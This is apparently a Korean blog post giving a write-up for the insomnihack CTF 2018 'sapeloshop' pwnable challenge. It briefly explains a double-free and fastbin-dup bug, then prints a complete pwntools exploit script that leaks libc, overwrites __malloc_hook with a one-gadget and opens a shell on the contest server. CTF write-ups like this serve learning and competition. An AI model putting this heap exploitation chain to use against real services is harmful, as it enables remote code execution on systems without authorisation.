-
insomnihack CTF 2018 sapeloshopPwnable/CTF 2018. 1. 23. 02:02
문제를 처음 잡을때 엄청 어려울줄 알았는데 그렇게 어려운편은 아니였다.
대회당시에는 NULL값이 들어가면 malloc인자에 들어가는 사이즈크기가 증가를 안 해서 포기하고 다른 문제를 풀러갔는데 대회 끝나고 write up을 보니 %00을 이용하여서 풀수있었다..
취약점은 sub함수에서 전역 포인터에 NULL값으로 덮지않고 free를 해주고 한번더 free를 하기위해서는 전역 포인터 옆에 숫자가 1이상이 되어야하는데 그 문제는 inc함수에서 0인지 확인을 하지 않고 +1를 해주기때문에 fastbin dup 취약점이생긴다.
익스는 함수를 안 써서 그런지 엄청 더럽다..
from pwn import *#p=process(["./sapeloshop"],env={'LD_PRELOAD':'./libc-2.23.so'})p=remote("sapeloshop.teaser.insomnihack.ch",80)elf=ELF("./sapeloshop")raw_input('$ ') #Connection: keep-alivep.sendline("POST/add"+'Connection: keep-alive'+"POST BBBB HTTP/1.1"+'Content-Length: 270'+'\r\n\r')sleep(0.5)p.sendline("desc="+"A"*260+"&260")p.recvuntil('</html>')sleep(1)p.sendline("POST/add"+'Connection: keep-alive'+"POST BBBB HTTP/1.1"+'Content-Length: 270'+'\r\n\r')sleep(0.5)p.sendline("desc="+"B"*260+"&260")p.recvuntil('</html>')sleep(1)p.sendline("POST/sub"+'Connection: keep-alive'+"POST BBBB HTTP/1.1"+'Content-Length: 9'+'\r\n\r')sleep(0.5)p.sendline("item=0&1") #item=index&sizep.recvuntil('</html>')sleep(1)p.sendline("POST/inc"+'Connection: keep-alive'+"POST BBBB HTTP/1.1"+'Content-Length: 9'+'\r\n\r')sleep(0.5)p.sendline("item=0&1")p.recvuntil('<div class=\"row\"><div class=\"col-md-8\"><img src=\"img/')main_arena = u64(p.recv(6)+"\x00\x00") - 88malloc_hook = main_arena - 0x10libc_base = malloc_hook - 0x3c4b10one_shot = libc_base + 0xf02a4print hex(main_arena)print hex(malloc_hook)print hex(one_shot)p.recvuntil('</html>')sleep(1)p.sendline("POST/add"+'Connection: keep-alive'+"POST BBBB HTTP/1.1"+'Content-Length: 270'+'\r\n\r')sleep(0.5)p.sendline("desc="+"A"*260+"&260")p.recvuntil('</html>')sleep(1) #0p.sendline("POST/add"+'Connection: keep-alive'+"POST BBBB HTTP/1.1"+'Content-Length: 104'+'\r\n\r')sleep(0.5)p.sendline("desc="+"C"*95+"&96")p.recvuntil('</html>')sleep(1) #2p.sendline("POST/add"+'Connection: keep-alive'+"POST BBBB HTTP/1.1"+'Content-Length: 104'+'\r\n\r')sleep(0.5)p.sendline("desc="+"D"*95+"&96")p.recvuntil('</html>')sleep(1) #3p.sendline("POST/sub"+'Connection: keep-alive'+"POST BBBB HTTP/1.1"+'Content-Length: 9'+'\r\n\r')sleep(0.5)p.sendline("item=2&1") #item=index&sizep.recvuntil('</html>')sleep(1)p.sendline("POST/del"+'Connection: keep-alive'+"POST BBBB HTTP/1.1"+'Content-Length: 9'+'\r\n\r')sleep(0.5)p.sendline("item=3&1") #item=index&sizep.recvuntil('</html>')sleep(1)p.sendline("POST/inc"+'Connection: keep-alive'+"POST BBBB HTTP/1.1"+'Content-Length: 9'+'\r\n\r')sleep(0.5)p.sendline("item=2&1")sleep(1)p.sendline("POST/del"+'Connection: keep-alive'+"POST BBBB HTTP/1.1"+'Content-Length: 9'+'\r\n\r')sleep(0.5)p.sendline("item=2&1") #item=index&sizep.recvuntil('</html>')sleep(1)#fastbin dup start !print "start"payload = "desc="payload += p64(malloc_hook-0x23)[:6]+"%00"*((95-len(payload))/3) + "&96"print len(payload)p.sendline("POST/add"+'Connection: keep-alive'+"POST BBBB HTTP/1.1"+'Content-Length: '+str(len(payload))+'\r\n\r')p.sendline(payload)sleep(0.5)p.recvuntil('</html>')sleep(2) #4p.sendline("POST/add"+'Connection: keep-alive'+"POST BBBB HTTP/1.1"+'Content-Length: 104'+'\r\n\r')sleep(0.5)p.sendline("desc="+"e"*95+"&96")p.recvuntil('</html>')sleep(1) #5p.sendline("POST/add"+'Connection: keep-alive'+"POST BBBB HTTP/1.1"+'Content-Length: 104'+'\r\n\r')sleep(0.5)p.sendline("desc="+"f"*95+"&95")p.recvuntil('</html>')sleep(1) #6payload = "desc="payload += "A"*0x13payload += p64(one_shot)[:6]+"%00"*((95-len(payload))/3) + "&96"print len(payload)p.sendline("POST/add"+'Connection: keep-alive'+"POST BBBB HTTP/1.1"+'Content-Length: '+str(len(payload)+1)+'\r\n\r')p.sendline(payload)p.sendline("POST/inc"+'Connection: keep-alive'+"POST BBBB HTTP/1.1"+'Content-Length: 9'+'\r\n\r')p.sendline("item=2&1")p.interactive()cs 'Pwnable > CTF' 카테고리의 다른 글
HITCON CTF 2017 babyfs (0) 2018.01.30 defcon 2016 pillpusher (1) 2018.01.24 Codegate 2017 Final building_owner (0) 2018.01.21 Christmas CTF 2017 BitcoinGallery (0) 2018.01.18 Codeblue 2017 simple memo pad (0) 2018.01.17